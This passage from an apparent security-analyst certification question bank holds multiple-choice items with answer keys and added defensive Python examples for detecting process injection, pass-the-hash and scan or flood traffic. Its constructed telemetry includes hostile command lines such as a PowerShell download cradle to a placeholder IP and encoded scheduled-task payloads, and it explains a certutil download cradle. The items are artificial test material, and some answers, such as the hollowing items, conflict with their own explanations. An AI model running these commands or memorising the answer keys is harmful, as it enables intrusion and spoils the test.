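    """Option D of Q79: executable pages with no file behind them. Legitimate code is file-backed."""
    hits = []
    for r in regions:
        if r["protect"] in EXEC_PROTECTIONS and r["file"] is None:
            kind = "manually_mapped_pe" if r["head"].startswith(b"MZ") else "shellcode"
            hits.append({"base": hex(r["base"]), "size": r["size"], "protect": r["protect"], "kind": kind})
    return hits


def unexpected_modules(modules, baseline):
    """Option E of Q79: DLLs the clean baseline never shows (side-loading or injected modules)."""
    return sorted(set(modules) - set(baseline))


def main_image_hollowed(proc):
    """Q109/Q113: in hollowing the main image stays file-backed but its bytes no longer match disk."""
    for r in proc["regions"]:
        if r["file"] == proc["image_path"]:
            return r["header_hash"] != proc["main_image_header_on_disk"]
    return True  # no file-backed main image at all is equally suspicious


def triage(proc, baseline):
    return {
        "pid": proc["pid"],
        "unbacked_exec": unbacked_executable_regions(proc["regions"]),
        "unexpected_modules": unexpected_modules(proc["modules"], baseline),
        "main_image_hollowed": main_image_hollowed(proc),
    }


if __name__ == "__main__":
    print(triage(EXPLORER, BASELINE_MODULES))
```

On the constructed snapshot the verdict is injection rather than hollowing: two unbacked executable regions and a look-alike DLL from a user-writable directory, while the explorer.exe image itself still matches disk.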

114
MCQ · medium

A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?

A.Windows Security Event Log (Event ID 4624)
B.Sysmon Event ID 1 (Process creation)
C.DNS server log
D.Windows PowerShell operational log
Answer: B

Correct. Sysmon Event ID 1 captures process creation with command line.

Why this answer

Sigma rules target a log source, and this detection needs the command line of the new process. Sysmon Event ID 1 records the image, command line, parent process and hashes for every process creation. Security Event ID 4688 is the built-in equivalent, but it carries the command line only when 'Include command line in process creation events' is enabled in audit policy. Event ID 4624 is a logon, and the PowerShell operational log sees the script only once it runs, not the schtasks.exe invocation that installed it.
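The two rules from Q99 and Q114, as an added example that is not from the page or from the Sigma project: each rule is written as the Python equivalent of its Sigma YAML and evaluated against constructed Sysmon Event ID 1 records with a small matcher implementing the Sigma semantics needed here (case-insensitive matching, lists as OR, |all as AND, fields within a selection as AND, and a 'selection and not filter' condition). The CcmExec.exe filter is an illustrative exclusion, not a recommendation.

```python
"""Evaluate Sigma-style process_creation rules against Sysmon Event ID 1 records (Python 3.8+, stdlib only)."""

# Constructed Sysmon Event ID 1 records (not from the page); Sigma's windows process_creation
# log source maps directly onto the Image, CommandLine and ParentImage fields.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,DllRegisterServer",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /SC ONLOGON /T Updater /TR "powershell.exe -nop -w hidden -enc SQBFAFgA"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /Query /TN Updater",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Python form of the Sigma detection blocks. The first is equivalent to:
#   detection:
#     selection:
#       Image|endswith: '\rundll32.exe'
#       CommandLine|contains|all: ['\Temp\', '.dll']
#     condition: selection
RULES = {
    "rundll32_dll_from_temp": {                      # Q99
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection": {"Image|endswith": "\\rundll32.exe",
                          "CommandLine|contains|all": ["\\Temp\\", ".dll"]},
            "condition": "selection"}},
    "schtasks_encoded_powershell": {                 # Q114
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection": {"Image|endswith": "\\schtasks.exe",
                          "CommandLine|contains|all": ["/create", "powershell"],
                          "CommandLine|contains": [" -enc", " -encodedcommand", " -e "]},
            "filter": {"ParentImage|endswith": "\\ccmexec.exe"},   # hypothetical deployment-agent exclusion
            "condition": "selection and not filter"}},
}


def _value_matches(op, hay, needle):
    hay, needle = hay.lower(), needle.lower()       # Sigma string matching is case-insensitive
    return {"contains": needle in hay, "endswith": hay.endswith(needle),
            "startswith": hay.startswith(needle), "eq": hay == needle}[op]


def _field_matches(key, expected, event):
    field, *mods = key.split("|")
    op = next((m for m in mods if m in ("contains", "endswith", "startswith")), "eq")
    values = expected if isinstance(expected, list) else [expected]
    hay = str(event.get(field, ""))
    results = [_value_matches(op, hay, v) for v in values]
    return all(results) if "all" in mods else any(results)   # list = OR unless |all


def _selection_matches(selection, event):
    return all(_field_matches(k, v, event) for k, v in selection.items())   # fields = AND


def rule_matches(rule, event):
    det = rule["detection"]
    cond = det["condition"].split()
    if cond == ["selection"]:
        return _selection_matches(det["selection"], event)
    if cond == ["selection", "and", "not", "filter"]:
        return _selection_matches(det["selection"], event) and not _selection_matches(det["filter"], event)
    raise ValueError(f"unsupported condition: {det['condition']}")


def run_rules(rules, events):
    """Return (event index, rule name) pairs for every hit."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in rules.items() if rule_matches(rule, ev)]


if __name__ == "__main__":
    print(run_rules(RULES, EVENTS))
```

The matcher covers only the condition forms these two rules use; real deployments convert Sigma to the SIEM's query language with sigma-cli or a backend rather than evaluating rules in Python.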

115
MCQ · medium

A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?

A.True positive - unauthorized access attempt
B.False positive - authorized activity
C.True positive - lateral movement
D.False negative - missed detection
Answer: B

The activity is legitimate and should be classified as a false positive.

Why this answer

The alert is triggered by authorized activity from a known internal scanner, so it is a false positive. The SIEM rule should be tuned to exclude this scanner or reduce its severity.

116
MCQ · easy

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

A.Accept the risk based on compensating controls
B.Reclassify the vulnerability as low severity
C.Immediately patch the vulnerability
D.Ignore the finding as a false positive
Answer: A

The isolation in the DMZ serves as a compensating control, reducing the likelihood of exploitation.

Why this answer

Compensating controls like network isolation lower the likelihood of exploitation even though the vulnerability remains critical, so the analyst can accept the residual risk with documentation and a remediation timeline. Reclassifying the vulnerability itself as low severity confuses inherent severity with risk, and the finding is not a false positive: the flaw is real.

117
Multi-Select · medium

During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?

Select 3 answers
A.DNS query logs
B.Sysmon Event ID 3 (network connection)
C.Domain controller authentication logs
D.Sysmon Event ID 1 (process creation)
E.Windows Security Event Log (Event ID 4624)
Answers: B, C, E

Network connections from a host to many others can indicate lateral movement.

Why this answer

Pass-the-hash authenticates with an NTLM hash, so it leaves NTLM traces rather than Kerberos ones. Windows Event ID 4624 on each destination shows the resulting logon with logon type 3 (network), authentication package NTLM and the attacker's source IP; the domain controller logs the NTLM credential validation (Event ID 4776); and Sysmon Event ID 3 on the source shows the outbound SMB or RPC connections fanning out to many hosts. DNS logs and process creation do not capture the authentication itself.

118
Multi-Select · medium

A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)

Select 3 answers
A.Windows Event ID 4776 (NTLM authentication) logs from domain controllers
B.Windows Event ID 4624 (Logon) logs from workstations
C.DNS logs from the internal DNS server
D.Firewall logs showing outbound connections
E.Authentication logs from the source machine showing logon type 3
Answers: A, B, E

Correct. These capture NTLM authentication attempts.

Why this answer

Windows Event IDs 4624 (successful logon, with logon type 3 and authentication package NTLM on the destination) and 4776 (NTLM credential validation on the domain controller) are the key records, and the source-side authentication logs tie the logons back to the originating machine. The rule correlates one source reaching many destinations over NTLM within a short window. DNS and firewall logs show connectivity, not the authentication.
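The correlation Q117 and Q118 describe, as an added example that is not from the page: NTLM network logons (Event ID 4624, logon type 3, authentication package NTLM) are grouped by source IP and account, and an alert fires when one pair reaches several distinct destination hosts inside a window; the domain controller's 4776 records are joined in through a constructed IP-to-hostname inventory, and a scanner exclusion ties back to the Q115 situation. All events, names and addresses are constructed.

```python
"""Correlate NTLM network logons across hosts to surface pass-the-hash lateral movement (Python 3.8+)."""
from collections import defaultdict
from datetime import datetime, timedelta


def _e4624(ts, computer, user, src_ip, pkg="NTLM", logon_type=3):
    """Constructed Security 4624 record on the destination host, reduced to the fields the rule uses."""
    return {"EventID": 4624, "TimeCreated": datetime.fromisoformat(ts), "Computer": computer,
            "TargetUserName": user, "IpAddress": src_ip, "LogonType": logon_type,
            "AuthenticationPackageName": pkg}


def _e4776(ts, dc, user, workstation):
    """Constructed 4776 record: the domain controller validating NTLM credentials."""
    return {"EventID": 4776, "TimeCreated": datetime.fromisoformat(ts), "Computer": dc,
            "TargetUserName": user, "Workstation": workstation}


# Constructed asset inventory so 4776 (keyed by workstation name) can be joined to 4624 (keyed by IP).
HOSTNAME_BY_IP = {"10.0.5.17": "WS-ADM-07", "10.0.5.20": "WS-JDOE", "10.0.9.9": "SCANNER01"}

EVENTS = [
    # WS-ADM-07 replays svc_deploy's hash against six servers in five minutes.
    *[_e4624(f"2024-03-01T02:1{i}:00", f"SRV-{i:02d}", "svc_deploy", "10.0.5.17") for i in range(6)],
    *[_e4776(f"2024-03-01T02:1{i}:00", "DC01", "svc_deploy", "WS-ADM-07") for i in range(6)],
    # jdoe maps a single share over NTLM: one destination, benign.
    _e4624("2024-03-01T09:02:11", "FS01", "jdoe", "10.0.5.20"),
    # Kerberos logons from the same workstation are not NTLM and must not count.
    *[_e4624(f"2024-03-01T09:0{i}:00", f"APP-{i}", "jdoe", "10.0.5.20", pkg="Kerberos") for i in range(5)],
    # The vulnerability scanner legitimately authenticates everywhere (the Q115 situation).
    *[_e4624(f"2024-03-01T04:0{i}:00", f"SRV-{i:02d}", "svc_nessus", "10.0.9.9") for i in range(8)],
]


def detect_pth(events, min_destinations=4, window=timedelta(minutes=10), excluded_sources=frozenset()):
    """Alert when one source IP and account reach >= min_destinations hosts over NTLM inside the window."""
    ntlm = [e for e in events if e["EventID"] == 4624 and e["LogonType"] == 3
            and e["AuthenticationPackageName"] == "NTLM" and e["IpAddress"] not in excluded_sources]
    by_key = defaultdict(list)
    for e in ntlm:
        by_key[(e["IpAddress"], e["TargetUserName"])].append(e)

    validations = defaultdict(int)   # (workstation, account) -> DC-side NTLM validations seen
    for e in events:
        if e["EventID"] == 4776:
            validations[(e["Workstation"], e["TargetUserName"])] += 1

    alerts = []
    for (src, user), evs in by_key.items():
        evs.sort(key=lambda x: x["TimeCreated"])
        for i, first in enumerate(evs):
            hosts = {x["Computer"] for x in evs[i:] if x["TimeCreated"] - first["TimeCreated"] <= window}
            if len(hosts) >= min_destinations:
                alerts.append({"src_ip": src, "user": user, "destinations": sorted(hosts),
                               "first_seen": first["TimeCreated"].isoformat(),
                               "dc_ntlm_validations": validations[(HOSTNAME_BY_IP.get(src), user)]})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_pth(EVENTS, excluded_sources={"10.0.9.9"}):
        print(a)
```

Without the exclusion the scanner fires too, which is exactly the false positive from Q115; the fix is a scoped exclusion on the scanner's source address, not a weaker rule.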

119
MCQ · medium

An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?

A.Lateral movement via scheduled tasks
B.Normal administrative activity
C.Memory injection attack
D.Persistence mechanism using a LOLBin
Answer: D

Correct. Scheduled tasks are a common persistence method, and the chain here is built from built-in binaries (cmd.exe, a look-alike svchost.exe, PowerShell, the task scheduler) rather than dropped malware.

Why this answer

The parent-child relationship is abnormal: a genuine svchost.exe is always a child of services.exe, never of cmd.exe, so this is a masquerading binary named svchost.exe. It then used PowerShell and the task scheduler, both legitimate Windows tools, to register a task that runs a script from a remote share on every trigger: a persistence mechanism assembled from living-off-the-land binaries.
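The parent-child checks from Q80, Q84, Q102 and Q119, as one added example that is not from the page: a table of expected parents for core system processes (plus their expected directory), the Office-to-script-host pairing, and the svchost.exe-to-PowerShell case, which is scored by command line because the Schedule service hosts scheduled tasks under svchost.exe. The process events are constructed.

```python
"""Flag anomalous parent-child process relationships in EDR telemetry (Python 3.8+, stdlib only)."""
import ntpath

# Genuine Windows system processes and the only parent they should have (by image name).
EXPECTED_PARENT = {"svchost.exe": "services.exe", "services.exe": "wininit.exe",
                   "lsass.exe": "wininit.exe", "csrss.exe": "smss.exe"}
SYSTEM_DIR = r"c:\windows\system32"

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "-enc", "frombase64string")

# Constructed EDR process-creation events (not from the page).
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\System32\wininit.exe", "cmdline": "wininit.exe"},
    {"pid": 600, "ppid": 1, "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"pid": 900, "ppid": 600, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"pid": 3000, "ppid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},                       # Q84
    {"pid": 2000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2500, "ppid": 2000, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "invoice.docm"'},
    {"pid": 2600, "ppid": 2500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},  # Q80
    {"pid": 4000, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 4100, "ppid": 4000, "image": r"C:\Users\Public\svchost.exe", "cmdline": "svchost.exe"},   # Q102/Q119
    {"pid": 4200, "ppid": 2000, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]


def analyze(events):
    """Return one finding per anomaly: pid, severity and a human-readable reason."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        parent = by_pid.get(e["ppid"])
        pname = ntpath.basename(parent["image"]).lower() if parent else "<none>"
        cmd = e["cmdline"].lower()
        # 1. Core system processes: wrong parent or wrong directory means it is not the real one.
        if name in EXPECTED_PARENT:
            if pname != EXPECTED_PARENT[name]:
                findings.append({"pid": e["pid"], "severity": "high",
                                 "reason": f"{name} spawned by {pname}, expected {EXPECTED_PARENT[name]}"})
            if ntpath.dirname(e["image"]).lower() != SYSTEM_DIR:
                findings.append({"pid": e["pid"], "severity": "high",
                                 "reason": f"{name} running from {ntpath.dirname(e['image'])}"})
        # 2. Office application launching a script host: the macro-to-PowerShell pattern.
        if name in SCRIPT_HOSTS and pname in OFFICE:
            findings.append({"pid": e["pid"], "severity": "high", "reason": f"{pname} spawned {name}"})
        # 3. svchost -> script host: a scheduled task looks exactly like this, so the severity
        #    comes from the command line rather than from the parent alone.
        if name in SCRIPT_HOSTS and pname == "svchost.exe":
            sev = "high" if any(m in cmd for m in DOWNLOAD_MARKERS) else "low"
            findings.append({"pid": e["pid"], "severity": sev, "reason": f"svchost.exe spawned {name}"})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

The look-alike svchost.exe produces two findings (wrong parent and wrong directory), the Word-spawned PowerShell one, and the svchost-spawned PowerShell is high only because its command line carries an encoded payload; swap that for a plain -File invocation and it drops to low, which is what a benign scheduled task looks like.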

120
MCQ · medium

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

A.High number of DNS queries to domains with high entropy and frequent NXDOMAIN responses
B.Multiple successful connections to a single external IP
C.Large data transfers over HTTPS
D.Unusual parent-child process relationships
AnswerA

These are classic indicators of DGA.

Why this answer

DGA domains are algorithmically generated and often have high entropy, frequent NXDOMAIN responses (most generated names are never registered; the malware cycles through them until one resolves) and are rarely seen elsewhere in the environment. Entropy alone is a weak signal because CDN and cloud hostnames also look random, so the rule should combine it with the NXDOMAIN ratio and the number of distinct never-before-seen domains per host.

121
MCQmedium

A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?

A.Non-credentialed external scan
B.Full port scan with vulnerability detection
C.Credentialed internal scan
D.Agent-based scan with performance throttling
AnswerC

Credentialed scans provide comprehensive results with minimal impact on performance.

Why this answer

A credentialed scan uses authenticated credentials to access the target, allowing deeper checks for missing patches and misconfigurations without intrusive techniques. This provides accurate results with less impact than non-credentialed scans that might cause crashes.

122
MCQmedium

During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?

A.A SYN flood attack
B.A misconfigured firewall dropping SYN-ACK packets
C.A TCP port scan
D.A half-open connection due to network latency
AnswerC

Repeated SYN packets to the same destination without response is typical of a port scan seeking open ports.

Why this answer

A closed port normally answers a SYN with a RST, so complete silence means the SYN was filtered or dropped on the way in. A scanner that gets no response treats the port as filtered, waits for a timeout and retries, which produces the regular cadence seen here; a SYN flood would involve a high rate of SYNs, not one every 30 seconds. Note that a single port probed every 30 seconds is indistinguishable from a legitimate client retrying a blocked connection, so checking whether the same source also touches other ports or hosts settles the question.

123
MCQeasy

Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?

A.Network analysis
B.Memory analysis
C.Registry analysis
D.Process analysis
AnswerD

Process analysis includes examining process trees and parent-child relationships to detect suspicious behavior.

Why this answer

Process analysis looks at process trees to find anomalies like a word processor spawning a command shell.

124
Multi-Selectmedium

A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?

Select 3 answers
A.-urlcache
B.-split
C.-encode
D.-decode
E.-verify
AnswersA, B, D

Used to download files from a URL.

Why this answer

certutil.exe -urlcache -split -f <URL> <file> fetches a URL and writes the body to a local file; -urlcache selects the URL cache operation and -split is what makes certutil write the fetched content out to the named file, so together they form the download cradle (-f only forces an overwrite). -decode converts a Base64 text file back into a binary, the usual next step after a payload is downloaded in text form, so it belongs in the same rule. -verify validates certificates and is ordinary administrative use. -encode can also appear in staging, but the three arguments that together indicate a download-and-unpack sequence are -urlcache, -split and -decode; a URL in the command line is the supporting indicator the rule should require.

125
MCQhard

An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?

A.Process hollowing
B.Reflective DLL injection
C.API hooking
D.DLL injection
AnswerA

Correct. Process hollowing replaces the legitimate process's code with malicious code without writing a file to disk.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, replacing its memory with malicious code, and resuming it. The absence of an on-disk executable is a key indicator.

126
MCQeasy

An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?

A.Agent-based scan
B.Non-credentialed scan
C.Credentialed scan with safe checks enabled
D.External scan from the internet
AnswerC

Correct. A credentialed scan with safe checks enabled gathers patch and configuration data through an authenticated session instead of exploit-style probes.

Why this answer

Service disruptions come from unsafe network checks: plugins that trigger a vulnerability to prove it exists, or fuzz a fragile service until it crashes. A credentialed scan reads patch levels and configuration locally over an authenticated session, and enabling safe checks suppresses the plugins the vendor flags as disruptive, so it minimises risk without giving up coverage. A non-credentialed scan is the opposite of what is wanted: it can only infer vulnerabilities by probing services from the outside, which is exactly what causes crashes (as question 121 notes). An agent-based scan would also avoid network probing but requires deploying agents on every server first.

127
Multi-Selecthard

An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?

Select 3 answers
A.The data transfer volume is significantly higher than normal for that server
B.The connections are occurring during non-business hours
C.The connections are made to a known malicious IP
D.The connections occur during business hours only
E.The server is using a non-standard port for HTTPS (e.g., 8080)
AnswersA, B, E

Unusually high data volume is a strong indicator.

Why this answer

Large outbound data volume relative to that server's baseline, transfers outside business hours, and HTTPS on a non-standard port (for example TLS on 8080 instead of 443, which can slip past port-based egress policies) are classic exfiltration indicators. Option D is simply the opposite of B, and option C contradicts the scenario, which names a cloud storage provider rather than a known malicious IP.

128
MCQeasy

A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?

A.Network-based scan without credentials
B.Non-credentialed external scan
C.Credentialed internal scan
D.Agent-based scan
AnswerC

Credentialed scans have access to system patch information.

Why this answer

Credentialed scans authenticate to the target OS and can query patch levels directly, yielding more accurate results than uncredentialed scans.

129
MCQhard

An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?

A.Reflective DLL injection
B.API hooking
C.Process hollowing
D.DLL injection
AnswerC

Process hollowing creates a process in a suspended state and replaces its memory with malicious code, matching the finding of code without a file backing.

Why this answer

Hollowing replaces the legitimate process's code in memory with attacker code, so the code executing no longer corresponds to the file the process was started from. In a memory image this appears as executable regions whose contents do not match the on-disk binary. Reflective DLL injection also produces unbacked executable regions, so in practice the analyst confirms hollowing by comparing the in-memory image at the process's image base against the file on disk.

130
MCQeasy

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?

A.Mark the finding as a false positive and close it.
B.Immediately patch the server to remove the vulnerability.
C.Document the compensating control and track the finding until patched.
D.Increase the scan frequency to detect if the vulnerability changes.
AnswerC

Correct. The vulnerability is real but mitigated; it should be tracked with the compensating control noted.

Why this answer

The vulnerability is effectively mitigated by the compensating control (WAF), so it should be documented as such and tracked until the patch is applied.

131
MCQmedium

During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?

A.DNS amplification
B.SYN flood
C.ARP spoofing
D.Port scan
AnswerB

Repeated SYNs without final ACK indicate a SYN flood DoS attack.

Why this answer

A half-open TCP handshake (SYN flood) is a common DoS technique where the attacker sends many SYN packets without completing the handshake, exhausting server resources.
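Worked example (added here; not code from the question bank): a Python handshake tracker that distinguishes the two shapes in questions 122 and 131 from a constructed packet capture. It records, per client flow, whether a SYN-ACK arrived, whether the final ACK arrived, and whether anything answered with RST, then labels each source. The capture, addresses, ports and thresholds are assumptions made for the example.

```python
"""Classify TCP handshake shapes from constructed packet records.

Added example, not code from the question bank. PACKETS is a constructed
capture; addresses, ports and thresholds are illustrative assumptions.
"""
from collections import defaultdict
from statistics import mean


def pkt(ts, src, sport, dst, dport, flags):
    return {"ts": ts, "src": src, "sport": sport, "dst": dst, "dport": dport, "flags": flags}


def build_capture():
    packets = []
    # 1) SYN scan from 203.0.113.5: one SYN per port; 22 and 80 answer SYN-ACK
    #    (scanner tears down with RST), 443 answers RST (closed), the rest are silent.
    for i, port in enumerate([21, 22, 23, 25, 80, 443, 445, 3389]):
        t = 100.0 + i * 0.01
        packets.append(pkt(t, "203.0.113.5", 40000 + i, "10.0.0.20", port, "S"))
        if port in (22, 80):
            packets.append(pkt(t + 0.001, "10.0.0.20", port, "203.0.113.5", 40000 + i, "SA"))
            packets.append(pkt(t + 0.002, "203.0.113.5", 40000 + i, "10.0.0.20", port, "R"))
        elif port == 443:
            packets.append(pkt(t + 0.001, "10.0.0.20", port, "203.0.113.5", 40000 + i, "RA"))
    # 2) SYN flood from 198.51.100.9: 50 SYNs to port 443, every SYN-ACK left unanswered.
    for i in range(50):
        t = 200.0 + i * 0.001
        packets.append(pkt(t, "198.51.100.9", 50000 + i, "10.0.0.20", 443, "S"))
        packets.append(pkt(t + 0.0005, "10.0.0.20", 443, "198.51.100.9", 50000 + i, "SA"))
    # 3) Question 122: 192.0.2.8 repeats the same SYN to port 8443 every 30 s, no reply.
    for i in range(4):
        packets.append(pkt(300.0 + 30 * i, "192.0.2.8", 51234, "10.0.0.20", 8443, "S"))
    # 4) A normal client completing the three-way handshake.
    packets.append(pkt(400.0, "10.0.0.33", 52000, "10.0.0.20", 443, "S"))
    packets.append(pkt(400.01, "10.0.0.20", 443, "10.0.0.33", 52000, "SA"))
    packets.append(pkt(400.02, "10.0.0.33", 52000, "10.0.0.20", 443, "A"))
    return packets


PACKETS = build_capture()


def track_handshakes(packets):
    """Per-flow handshake state keyed by (client, sport, server, dport)."""
    flows = {}
    for p in sorted(packets, key=lambda x: x["ts"]):
        client_key = (p["src"], p["sport"], p["dst"], p["dport"])   # sent by the client
        server_key = (p["dst"], p["dport"], p["src"], p["sport"])   # sent by the server
        f = p["flags"]
        if f == "S":
            st = flows.setdefault(client_key, {"syn_ts": [], "synack": False, "ack": False, "rst": False})
            st["syn_ts"].append(p["ts"])                 # retransmits land in the same flow
        elif f == "SA" and server_key in flows:
            flows[server_key]["synack"] = True
        elif f == "A" and client_key in flows and flows[client_key]["synack"]:
            flows[client_key]["ack"] = True
        elif "R" in f:
            for key in (client_key, server_key):
                if key in flows:
                    flows[key]["rst"] = True
    return flows


def classify_sources(flows, scan_ports=5, flood_half_open=20):
    """Summarise each client address and label the handshake pattern it produced."""
    per_src = defaultdict(lambda: {"ports": set(), "half_open": 0, "unanswered": 0,
                                   "completed": 0, "reset": 0, "retry_gaps": []})
    for (src, _sport, _dst, dport), st in flows.items():
        s = per_src[src]
        s["ports"].add(dport)
        if st["ack"]:
            s["completed"] += 1
        elif st["synack"]:
            s["half_open"] += 1          # SYN-ACK sent, final ACK never arrived
        elif st["rst"]:
            s["reset"] += 1              # closed port answered the SYN with RST
        else:
            s["unanswered"] += 1         # neither SYN-ACK nor RST: filtered or dropped
        ts = st["syn_ts"]
        s["retry_gaps"].extend(b - a for a, b in zip(ts, ts[1:]))
    verdicts = {}
    for src, s in per_src.items():
        if s["half_open"] >= flood_half_open and len(s["ports"]) <= 2:
            verdict = "SYN flood"
        elif len(s["ports"]) >= scan_ports:
            verdict = "port scan"
        elif s["unanswered"] and len(s["ports"]) == 1 and s["retry_gaps"]:
            verdict = "unanswered SYN retries"
        else:
            verdict = "normal"
        verdicts[src] = {"verdict": verdict, "distinct_ports": len(s["ports"]),
                         "half_open": s["half_open"], "unanswered": s["unanswered"],
                         "completed": s["completed"], "reset": s["reset"],
                         "retry_interval_s": mean(s["retry_gaps"]) if s["retry_gaps"] else None}
    return verdicts


if __name__ == "__main__":
    for src, v in classify_sources(track_handshakes(PACKETS)).items():
        print(src, v)
```

The question 122 pattern is reported as unanswered SYN retries with its interval, because silence on one port is ambiguous (a slow probe, or a legitimate client whose SYNs a filter is dropping); the same tracker labels a source a port scan as soon as it touches several ports, and a SYN flood when many half-open flows pile up on one port.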

132
MCQeasy

A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?

A.Endpoint detection and response (EDR) logs
B.Firewall logs
C.Authentication logs
D.DNS logs
AnswerC

Authentication logs directly record login attempts and outcomes.

Why this answer

Authentication logs record login events including source IP, timestamp, and success/failure status, making them the best source for identifying successful authentication from unusual locations.

133
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

Select 2 answers
A.Frequent DNS queries
B.HTTP POST requests
C.Large outbound data transfers during off-hours
D.Use of SCP on port 22
E.ICMP echo requests
AnswersC, D

Off-hours transfers are suspicious.

Why this answer

Port 22 (SSH) and SCP copy files over an encrypted channel, so an internal host pushing data to an external IP this way is a direct exfiltration indicator, and large outbound transfers during off-hours are the second. Both C and D are taken straight from the observed traffic.

A (frequent DNS queries) would point to DNS tunneling, B (HTTP POST requests) to web-based exfiltration, and E (ICMP echo requests) to ICMP tunneling; none of these appear in the observed traffic.

134
MCQeasy

A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?

A.Nikto
B.Wireshark
C.Nmap
D.tcpdump
AnswerB

Wireshark dissects captured packets down to the payload, which is what is needed to examine content; tcpdump captures but offers little protocol decoding, and Nmap and Nikto are scanners, not analysers.

Why this answer

Wireshark captures and decodes packet payloads. Because port 443 traffic is normally TLS, the payload is only readable if the analyst has the session keys (for example from a TLS-inspecting proxy or an SSLKEYLOGFILE export); otherwise Wireshark still exposes the handshake metadata (server name indication, certificate, cipher suites) and the size and timing of each exchange, which is often enough to characterise the traffic.

135
MCQeasy

Which of the following is the primary purpose of log normalisation in a SIEM?

A.Encrypt logs to protect confidentiality
B.Reduce storage space by compressing log data
C.Remove false positives from log entries
D.Convert logs into a standardised format for correlation and analysis
AnswerD

Normalisation ensures consistent field names and values across diverse log sources.

Why this answer

Log normalisation converts logs from different sources into a common, structured format so that the SIEM can correlate and analyse them uniformly.

136
MCQhard

